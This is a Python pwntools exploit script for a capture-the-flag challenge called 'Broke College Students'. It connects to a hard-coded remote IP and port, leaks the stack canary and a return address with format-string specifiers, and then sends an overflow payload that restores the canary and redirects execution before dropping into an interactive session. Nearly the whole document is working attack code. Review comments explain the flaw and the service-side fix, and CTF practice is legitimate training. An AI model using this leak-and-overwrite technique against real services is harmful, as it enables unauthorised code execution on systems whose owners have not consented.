Broke College Students
#!/usr/bin/env python3
from pwn import *
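# Force the remote target: conn() reads args.LOCAL, so assigning False here
# means the local/gdb branch is never taken, whatever is passed on the
# command line.
args.LOCAL = False

# Load the patched challenge binary and let pwntools take its context
# settings (architecture, endianness) from it.
exe = ELF("brokecollegestudents_patched")
context.binary = exe

# Silence pwntools' own log messages. The original assigned 'critical' to
# context.log_console, which selects the output *stream* (a string there is
# treated as a file name to open), so it created a stray file named
# "critical" instead of setting the verbosity level.
context.log_level = 'critical'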
def conn():
    """Open the tube used to talk to the challenge.

    Returns a local process of the loaded binary when ``args.LOCAL`` is set
    (attaching gdb to it when ``args.DEBUG`` is also set); otherwise a TCP
    connection to the challenge service.
    """
    if not args.LOCAL:
        return remote("143.198.184.186", 5001)

    tube = process([exe.path])
    if args.DEBUG:
        gdb.attach(tube)
    return tube
# Two fixed addresses; presumably both were read from the same image in a
# debugger session (0x5555... base) — TODO confirm where they came from.
system = 0x00005555555554F1
ret = 0x000055555555588C

# Only the distance between the two is used: main() adds it to an address
# leaked at run time, so the absolute values above need not match the
# addresses in the running target.
off = system - ret
def main():
    """Run the three rounds of the challenge dialogue, then go interactive.

    Rounds one and two submit a format specifier as the "name" and parse the
    value the service echoes back; the script treats the first as the stack
    canary and the second as a return address. Round three submits a long
    name that carries the leaked canary and an address computed from the
    second leak plus the module-level ``off``.

    NOTE(review): the flow implies the service uses the submitted name as a
    printf-style format string and stores it without a length bound (the
    filler before the canary is 24 bytes). On the service side the fixes are
    a constant format string (``"%s"``) and a length-limited read.
    """
    tube = conn()

    def open_name_prompt():
        # Each round starts with three selections of option "1".
        for _ in range(3):
            tube.sendline(b'1')

    def echoed_value():
        # The echoed value sits on the 4th received line, before the text
        # "What" that follows it on the same line.
        return tube.recvlines(4)[3].split(b'What')[0].decode()

    # Round 1: 9th positional argument, printed as hex.
    open_name_prompt()
    tube.sendlineafter(b"name?", b"%9$lx")
    canary_hex = echoed_value()
    print(f"Leak Canary: {canary_hex}")

    # Round 2: 11th positional argument, printed as hex.
    open_name_prompt()
    tube.sendlineafter(b"name?", b"%11$lx")
    ret_hex = echoed_value()
    print(f"Leak ret: {ret_hex}")

    # Rebase the fixed offset onto the address seen at run time.
    target = int(ret_hex, 16) + off

    # Round 3: filler, the canary put back unchanged, 8 more filler bytes,
    # then the computed address.
    open_name_prompt()
    payload = b"".join(
        [
            b"A" * 24,
            p64(int(canary_hex, 16)),
            b'A' * 8,
            p64(target),
        ]
    )
    tube.sendlineafter(b"name?", payload)

    tube.interactive()
# Run the dialogue only when this file is executed as a script, not when it
# is imported.
if __name__ == "__main__":
    main()